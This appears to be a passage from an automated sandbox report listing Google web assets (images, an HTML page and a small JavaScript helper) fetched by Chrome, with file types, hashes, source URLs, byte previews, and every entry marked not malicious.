                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702058823172319
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:trNj86uCCPUDKwdSJKF0QEtYhKE4R/58ORBKaS:txj86udsmwdAKF0nYhNumPB
                                                                                                                                                                                                                                                                                          MD5:FFAEAE3430F2342BCBEF8EBA3D6F7937
                                                                                                                                                                                                                                                                                          SHA1:18CA92FD70E2C377D58C514FF598A8413628B232
                                                                                                                                                                                                                                                                                          SHA-256:9F2C5988EBF7C6D15B2548F225CF370A9083BACCA79FC202988057F3CEB28606
                                                                                                                                                                                                                                                                                          SHA-512:3672C4E5AC0E73280F24650494D004C6B984D48E90A24F24ECE834AB15FA3A0F17CD3E7D7930B18187B5DC86CD7FB1CCE04BF12DE9D383E333290440F59FC328
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/87/25/1c660d45454ea6f925ea1ea849da/leaf.svg
                                                                                                                                                                                                                                                                                          Preview:<svg width="23" height="26" viewBox="0 0 23 26" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.315068 0C0.107123 1.20714 0 2.45143 0 3.71429C0 15.9776 10.1452 25.9257 22.6849 26C22.6849 26 18.274 14.8571 13.863 10.5238C9.45205 6.19048 0.315068 0 0.315068 0Z" fill="#137333"/>.<path d="M22.6849 26C22.8929 24.7929 23 23.5486 23 22.2857C23 10.0224 12.8548 0.0742857 0.315063 0L22.6849 26Z" fill="#82CC52"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):351236
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.6567462935940074
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:+GcB2siUrXq5ZPpse6Rk4rgpjd4ianKTKzmaqqQISRv2DX30K:jJkq5ZRULgpJ4ianKTUHqNBRveX
                                                                                                                                                                                                                                                                                          MD5:89B98F1C3C183343F9D7BB07135FECF6
                                                                                                                                                                                                                                                                                          SHA1:298987D871A21341F769183A58361AC4F67C4587
                                                                                                                                                                                                                                                                                          SHA-256:400CD98457F8880D61838E29C4ABEDF02301EEC3C3A1610F862F16DD86251E1B
                                                                                                                                                                                                                                                                                          SHA-512:AC2ED2922DA1134D5B2BB0EC7ECC68FB1B733A5D646BC30A72FFDD0824D3963F1C1721F2D67FEEED0BEE74750AABBC8F0BBE71C1D0D1D62506D48339305BF766
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.[..WEBPVP8L.[../..D..u!...R...6.Q.^..1.=W...R.....-....(q.K/.....r.H.{N..B-_...C0.....E1.1..6.>..S.].....Q.vk..v.*x.I<.......v.....0.1.a.x..."...10..}kY-...o....ow....N.&.U....\{.s.==...IwHy.k.wH.....s!.#.H....n.z..{.1.^i.....y.... (...m...e.K+S6...x..H..e..yQ......Z".......W.m.7....u.&......oF .a3... .@`..!h .!.!.!.:a..U..D.).>T..u......F..AU...<-:Ox.8k#.>.E8e..-..v`.N..E.`.".U..Z.@w#..N....Gm.0.....&2.#....%I..6....W4f..y@......%.t.Acf..zkk[.m[......H3..!......(.........?.\.c.Y...m........z....=M....l[WR.I$...`(.(.0...nz.U.F......4...Fk....jM?..M9..C.@.H .._P.)E....B..m........r.mN$..Tu7..n.P.=.}....D.26Q...{.1..B._..@(....j.m;....S...1....~.%..B-.b%....%P....+.B.&..:....S......$.z....0..+....j.=.".i..k...o...^o.{..72n.".F..{.2.6GS!...[.....[..U`V6.......<..dVf5+[.S.k...sr...7.Yo.Ic..Am.W..........m....N6M.....~_.....$I......2A).J..<.S[9..'..y..g&....s.Yff..Xf..Z............+U...Gx...l....$...t.;\..fVd3..q..m.6..LX.]....._......c. ./n
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2129
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.885572035830442
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:mpSrqBAnO+ZvuhgRvqpasQGPM3aS6hRlGmVZJJvBpqHiAQTjLfKn0WEb3/NrOaHq:mQOoslawtVRvBpqHzQuSNaaIRrE6
                                                                                                                                                                                                                                                                                          MD5:768AA3466121F4E2000E9D2E9049F3CA
                                                                                                                                                                                                                                                                                          SHA1:8CF935957C99B733027B540BAADCEA0ADADE515E
                                                                                                                                                                                                                                                                                          SHA-256:C957815473F87DEF27FD89A83B1250CAAEED629C6E745A6A99F13B36ED68C1D0
                                                                                                                                                                                                                                                                                          SHA-512:1634664926C44009616F643779E185CEC17708C17651CAF35E62919F4DF42D6C0F5EDD44E30FA67C077E7F4FFB8E15B431F8456E8B41E29F9EE1557A87C604A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh...{pT...?......6!.._R.......B...U..E.......X*4..R.T......S..J.R...T.8RJ..(....!...? .M.f.n..........=...[ O.w.R|.......h...\...+..WY~..D.-....{..4...cHm.v+.......>z.4...l......H..k2...;.......%...K..[....5)f ...S..)..kn........~.j...uw..1e.U......BU.R.#V.,..K.kP..>_.....%?..ji.yJ...bE.\.^.6..o.q......>.bc.l.Vjyy...#....)]:M)u .zV0.....^.9.o.^..."....tZ...X....~..;.$........L...W........o.V....+..9..(.....6?.U.d.eku..,.Znz.<..iJq[....03s..g.....p3.j...SM.....0...m..8...3........?...wS..l..^.Z...].d.0>!N-.g...q'...*b.{V..k*A......N.........iIuF...cyyvd..-...G.j...]...l...o.. S........R...U4.....*.o...t.m...>.-....{.......4...s.3..@yJ........g.\.F....eN.....j..../e:I...F.kPM.N(.n<.....V.5.Z....`.F....m...(....5...&.y..C6]...3...H).fu.u..f...:......).J.MF..S....u.(0...[?.,.$......<v...f....;...z2../Zk..Gyr.y{..N..h...d.02e.o.-.ze..k..a"..1.H[..6]....h....C.f...T(........_. ..g.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6221)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):167739
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.775233632018635
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:y+facQhSamtbgzs3YDcfIALU8Z8IrVbZ8IrVeZ8IrVIhdG2KxuerNSRT0THOtfPR:y+OhSamtbgzs3YDcfIALU8beKKG7GY
                                                                                                                                                                                                                                                                                          MD5:AABC06842527D0C446D2C7BA5001A999
                                                                                                                                                                                                                                                                                          SHA1:067FBA0030B0941BF556B623CC9D88B1A108DCCB
                                                                                                                                                                                                                                                                                          SHA-256:9DCA3F9760B5BC22419252530676C97AEC50F200D3B1F07E112519226D80AB7C
                                                                                                                                                                                                                                                                                          SHA-512:67BF8B1F8E39E37868CF094CDF20CD8E41797A029941ED78DBBC66320423E74E6B999CDCF5D99099FFBBB0C67CCF3C90856CE092915275833C05570A57CAC24F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Preview:<!doctype html>.<html lang="en" dir="ltr">.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width,initial-scale=1">.<title>Google Search . What Is Google Search And How Does It Work</title>.<meta content="website" property="og:type">.<meta content="Google Search . What Is Google Search And How Does It Work" property="og:title">.<meta content="Google Search . What Is Google Search And How Does It Work" name="twitter:title">.<meta name="description" content="Uncover what Google Search is, how it works, and the approach Google has taken to make the world.s information accessible to everyone.">.<meta name="og:description" content="Uncover what Google Search is, how it works, and the approach Google has taken to make the world.s information accessible to everyone.">.<meta name="twitter:description" content="Uncover what Google Search is, how it works, and the approach Google has taken to make the world.s information accessible to everyone.">.<meta conten
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7094
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.964645757212399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:3vU3EL5KGd8MjY+tCuDwELqk6LF9t86pEaAm6:38A4Gd5M3KDLqlpfREat6
                                                                                                                                                                                                                                                                                          MD5:10DF50D0F76BF788DC9DB560164B9E77
                                                                                                                                                                                                                                                                                          SHA1:7CF6203371658A4F3344458C841C1CCE44AF8C4B
                                                                                                                                                                                                                                                                                          SHA-256:C5373F1E7D948DEC3485F721443313E550881C82CCE88DEFC30C1D927E953318
                                                                                                                                                                                                                                                                                          SHA-512:B9BBE09EFC3ADB5981E21096F9D0C3C2228CA58058BC685F0C15D93B91E99AFF84C0C5453EAE6FE7C34E3683524B7DA5F685F916CA7A747CC0EB869F019BF93E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/u2XGSr0jis3w5sLeuh8UMqGHgtdqPVPi77xYhPJdMO9C41wYUue3EKPJvwp-ovAlTzt3Ux3R4Mww2HlJ31UKre8vz1Cnno-3MxvWtA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....bKGD.............[IDATx..i.\Gv.......-..Iq.2"%..(....e4.1...9#'c 10.$....#H..../.$@. ..A.L.L......l..4..$..(...GR."...._o..:.p..{..}{y."....~..N...S......`....`....`....`....`....`...h........8\(.G......c...bm|L....6L.B...$..Hm.jS....H.8Z/.-K.v3....].)..bE....?t..\.n>(.nI...J.V.[..J.T..|....!]..z...].(Fb.rt...r.M......._.........Je......O..?W..j......O.$M.Lk.k}xcF.]jT.dV...+f....}.\.~..tY`.G.......r..r...%.Yk..K..L....E-....$9I..De.hx.5d..[w.0.......%x..{...*&..[W]<.m......C..%.h.V...lp,)...F.n.W3.@....&..VTE+...@c.\......m3...*....eF....<.C>...X?.p..xm!.[E...g.X.D}-.V..8...y.*(...,..,......Y.=.%....Y.x..."s6.6w.SS.8....@...C..5.....X.r.*....GB....5.c..<[R..1s`.`C.V..{3!..y._...9d.. .gX%..R`.....t...>{Fr.]dKz..f.....2...!*l0.<..fGn.Y...n`.B.&XC%..y_..../...?R..2...9.....a..~d.......F^(z.].W.;...w....P)......(.....h.G...Y`.;.,`.G.'.7Im..6o.=....4.Us..[Np....:.....JQ-{S......c.....c.,.i.."
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5894
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.91258480949016
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:P+7K8Wt/m/YlmwGGSb4PnZlFJKa7pHDoGs5bRw5Fers+TyiNVXAXl:PGxWtOYlmwG3SPHttHsGsfw5FeTywXAV
                                                                                                                                                                                                                                                                                          MD5:CD6042B05D68EF862466B80FBE8CB027
                                                                                                                                                                                                                                                                                          SHA1:E145A47D30FBF703044CF305A75EEAAD84D1C218
                                                                                                                                                                                                                                                                                          SHA-256:EF709E59D5B3227B06EED050A360444F5924C316733C01AE17912732D3E1C3F2
                                                                                                                                                                                                                                                                                          SHA-512:65DA27D76B3440A581873F9A34962B67AEBD8C7F2FC0B448896C89A63B592EC7209778792BA82C1B3254D92E9FA167E830D8CC4173A1A228971911EAFC18E069
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i1!3i4!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=54498
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?.o...$e..O.....m$)..A~fT.6.....?...Z.........1.`ps6.fL.Aq&MA.......)........f4..G........q.5.8...._..Dg.*r.}b.....MT..G..G..-{s......i...CD.'..U.WCZ..W...[.b....*...E..V.%o.9X\.].<)S.ES.Oj.......b..A.<2y.Z%....S....3...$.X|.j4LQ...)..Ab..l.....MRJ...9...lh..McT..j...._lZI...s......)..@.;}s.....-....J.E..~.P.{Q....P.%0.Wr}.4O..M..."C}...3...*.h......*Y.^...I..M........=.....b!.&..z9.,...Z..Dv.zze.l.[....j..J.j3._U.........__..<ELj......FR..'..w.v...."+..\......J?..|Q.=5IrLR...-;i...++..$y.<k..SJ..j...c......*er.*.M....$..-V.n...$L".4..1...$.......-.+.JJ..2...\Dj.....*...<.]...;L..)y..\..b.H8..V.."$.....Lr`T.FC...D..lG....u.+..].....n..<ej.+...$0.I...N..+[.U.0%LNZ.Tu.tO..$.I.U.T..rA&...A..Jt......;.vf.c..M... r.3.q.M..hw.E.5.....$9.`M.u:T.8...F.drL...E..x...Xz]..H1.........L.}.r..h.NiS/.Z..~Z.7N.;.._.....9._W......6_.*2.......?_......?\Z..".d..s....GO.?9....y...o~....0..).6....o....}.C..3.w~.....Z.../w.x.`.G...~...^8.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):61467
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.979687428130604
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:QQv0FbEZ9G35SZxh9IBHQAjQfv5FtFZGX:Q00t5SHIeFFG
                                                                                                                                                                                                                                                                                          MD5:F7D18CBC610C26ECED9C03C38D306E80
                                                                                                                                                                                                                                                                                          SHA1:88A64EF0F026734C661CAF70D6A2DDA9663AC560
                                                                                                                                                                                                                                                                                          SHA-256:C842822C5366C8F3A094CDA95092F1DA3CAE3D72673A46FE5826277757B7A8D3
                                                                                                                                                                                                                                                                                          SHA-512:6EBC14FB37383CEB33078D27A23C350A311B6CA25D91B2EF3ACC3955575578A412D93ABD5BA67FFAE660B93A7DB44B3C17649FAF2DA40B5A15A980CF99951308
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................Z..........................!..1Q.."2Aq.#Rar........3B.....$STb.....Ccs...4t....D..%U.....................................D.......................!1.AQ...2aq..."3R....B..#br.4..$D....S...%C............?....Y.4).Y. ..............EeH...{}t........j.......(..M*B...Q..@...4...4E,.cJ.L{....P..".[?9.._.......C..g.Wq..v>.U.Wee......Y..I{......K..)..&9.=....5.?..b..U......P.4T..R...sY.@P.....)...Q....{.o..j.o.V%i.4..{{b.......m,..(\.Q.sX............e.......Z....._oM }...h..onTi.Cw........41@...Yo...).P%\-...|~....L:...c...?..>.*Sl6D>....i._....M...f..3....\.j..f.n../.~oq.,..../2;.b..=..5..I<.i.j}J:+....G.y/..~h..=5...c.wHF3.R{O.|.F>.mA.M.....>y....cf0.......Qc.V.%.L:.....n....x-..=..k..,.v..w..>..h#.....k..Q.O.B......4.`....DP&.......:T.... im.H.&.*+@.4.D....(..).4.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):260
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.78051114137481
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:AE0BmKARY6sKA7LNs7QRhNRBnj8NRUjgM6uzW0XyXrqn:ArnIYCMLuGiJ0XYrq
                                                                                                                                                                                                                                                                                          MD5:1E1A1471FBC30200FE7F6BEFA17EB503
                                                                                                                                                                                                                                                                                          SHA1:27389E5F5D1B1DD91348DF99B5A40CE3734CED6D
                                                                                                                                                                                                                                                                                          SHA-256:032D52BDAF2CAD96B8E6BC6635114DC9E972D3387AE7AF6BF84DE9D5815C5CD3
                                                                                                                                                                                                                                                                                          SHA-512:D67E21E03820CE3A626DF2A2E0FCD9154471A5D79E7866C1B23EF17D815D8C834248903AB7B21812B380EE7980CD0CE9A29B1A6AA26D48F62FA074B491A228E2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/HxYQzxVf.min.js
                                                                                                                                                                                                                                                                                          Preview:function s(o,e,n){let t;return function(...i){const u=this,r=()=>{t=void 0,o.apply(u,i)},c=()=>{t=void 0};n||(clearTimeout(t),t=+setTimeout(r,e)),n&&t===void 0&&(o.apply(u,i),t=+setTimeout(c,e))}}function d(){return document.dir==="rtl"}export{s as d,d as i};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5017
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.935873858259602
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:l5QfK0ucO5JrrxhDYRxyCowdz+C1QCKSW0A1w1isxeWJepW:0bFO5JPxhnCZ+NSW0A1w1iRWJepW
                                                                                                                                                                                                                                                                                          MD5:DFAD0FB219D858E4C577037B2678A1E2
                                                                                                                                                                                                                                                                                          SHA1:D25073EE4CDEE93CD0E91E4F677719F09D06C9B8
                                                                                                                                                                                                                                                                                          SHA-256:B564F7295D3C4E11B7C2C3F9B64C6E55F5C59E21CA68819CDF685540F4EF6818
                                                                                                                                                                                                                                                                                          SHA-512:E5498B1E82E84A3705D3F113CB082BA79B9A35D9306B2A376AFFB3C40D90A4620E7A847371E959158459FFFAC027BE391D036C29B60BFA062088DB394B0431A3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/gglWI8y0x_H0LIUgCjTQp7RLHEkMVvcd5A4iH6V7BO-fqALnIaJAbVcBsfWa_3iCiK6ZdJhAyJf-dUPJfLXvIXTXXGdZxLDFY5Zbw4O0xyQRoQK_1ZU=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....PIDATx..]k...u.N....."........PP1El...8....2F...C`J!.<$!$Cx)!8.DD ...UT.P....P..$V.I .P..\.+..}.L.=..}.....h.{vF_..;.{.....s..8.ch.......\..Y..w.2E..>...9.$38y7 ct30>.Fd...........`O.m..mE....H....%..I.6E)...Y...........w;.D[.\*u}...y.#K...U.|..|...s.[p..nE.h.8x..x.U..j...i.lV.....;.P.`...........re.b.......y.'+....5.........6"K..........5.-,.....8.P2...p.M...L......f.v...D.wsnV&h..=.|........UuN....-O...}|....-...._...v..).6...<.}.._..+..`.PpK.sn^....3xv8.....w.T...}.FK.|.}=7...`.%M..0..U...w~+.F6.-Mp.Z.1.....|&.sr.2.4..f..%x...f0x.......f..d...\...v...jY........^..x...^..?.ok...$x...P...P.z..g.H...s.=7<!..7.-I..*.....Ka%..........T~-n.(......n;oh..&&......~f...*......N>..;&....D.Yp.2.....|...H`..1P.8.r>.n.Z...._.+.l.s.......G..BQ3...f.}.....1h)....WEs,QD.=.....g...._..uG..|...O+....R.8 $..MK...+...oy$.>4.-!..>.....O{.8......"..#.TT6$(....Hl)"..N<}.....kG.......7......d.....LV...`T.>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):782
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.663075082819543
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7tV2Ngbl5OtgJxlh1AARmuS+iBNjfOLvPbv//RZrskIZzYwCM+AqalZ0nQ6Sh:EV2CxlrZivkvPz/JiDZzYwCM+SODi
                                                                                                                                                                                                                                                                                          MD5:FF6089EAA756E4DC83A95C998F63BCFD
                                                                                                                                                                                                                                                                                          SHA1:8ECF67F4ABE4C3A6E8304D01DD75B055738A0FB7
                                                                                                                                                                                                                                                                                          SHA-256:B570AA59F2B1087731630AB10FF7F172DA3A3D079379149EBF6DB00E99A53FC6
                                                                                                                                                                                                                                                                                          SHA-512:2B97E86D1A57711029F8ED715FAACD44A37F206CD3DE8A3D71D49F2781CBBF499957BF7CE51238509DF5F289E55F724E88ECFCB67BBA31DA83811989020CD5E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..=h.A...c4.."B....6. .E.h@0*\...RE...b${..........F,7....U. .Q.?.`4.......H."W...w..]....y....oog.F`.|..@. ..B...bD.Z.|..`.h.uJ.A.b.d8...w9..@.. p}..Q.F.....S..[...U.F.U.2..+..n..P...2.....w..h..L:.i@.......t.@.+.2]..H..JK.6....n...Y.....;G;.|.:...t..|.u..c.^G..e.....".a..B03;..,R.......5....i.l..qM.C.ghI;y.@.(=q..Z.M3?..$..b.....K..3.V.5.2]9...LW.d...&..3#..@...;V...0.l...n|.......2G%..zVAx6_.K.`.4..3K^.-..n.R.uI^...FJ...PR...l......6....L! ..t.k':..4&.D..k\j..+...3...).)..W..;........H..0....]eT....h..J7...<`z.#.c.1.d9...QH..R.....xm\..=....=j..OcL...\.hUyD..Y.#Ac..K.@...J.G..v%..0..".}....Q.-......q...[(..A?....I_k9.4...x.. ...2......M..#,_.."...y.y.x....../.e&.....}..,......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8938748179764
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:aGmurFSJs329qIqvZO7N4+lRSm+3gdfI8hV92jPH9b45MloqbSHTrpG:4QUvKI7943UJhn2jP3pUG
                                                                                                                                                                                                                                                                                          MD5:6282A05D151E7D0446C655D1892475E2
                                                                                                                                                                                                                                                                                          SHA1:B2B05F319DA0E73250200AE9BB518A318D6B4C5D
                                                                                                                                                                                                                                                                                          SHA-256:4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
                                                                                                                                                                                                                                                                                          SHA-512:DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).*....q....\....9B>...)>#2...A....z..8.#+A.V-..h*h....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[.....*.w...&K..$..K..\.t..QoY..O?....u.Sa.*-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.*....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:*.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P|[....R].m,.......Z..Pk.g0.yl...Z.qp..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4888
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.94980586497001
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oqFy4xh2SgEK1iK4oz92JJwABaJjJ/Rv0u6I9fyFdDW8Q1FY:3PxMSgh4hJwABsj3Mu6WfyFdDb
                                                                                                                                                                                                                                                                                          MD5:D44681DAABE3872301FC81E27B9D9BD1
                                                                                                                                                                                                                                                                                          SHA1:C3F29D5B93972053934EC91CA9DB8BC0EEE5F58C
                                                                                                                                                                                                                                                                                          SHA-256:A85AF554CDFB5C0945684088998CFD108CA9B60A30B938BB720A8EAAACC9D2BD
                                                                                                                                                                                                                                                                                          SHA-512:965866A6F6EB4E904491E4C2DEA3FE06336D79ECEF2BCD685F022C4210D051A755F8656C823D920C0A03AE2FE371B5D73B80376A4328C9D3487FEB116DE41107
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/6cr6PdE9s0J1ovFNm38uf-dwcOP--68QMWey603BCUah-QcO0gL0TvyqmTBYIgNnJfk8AEgISH_xpw_zd8FNao0jA14Q5MQ7p-eeIto=h120
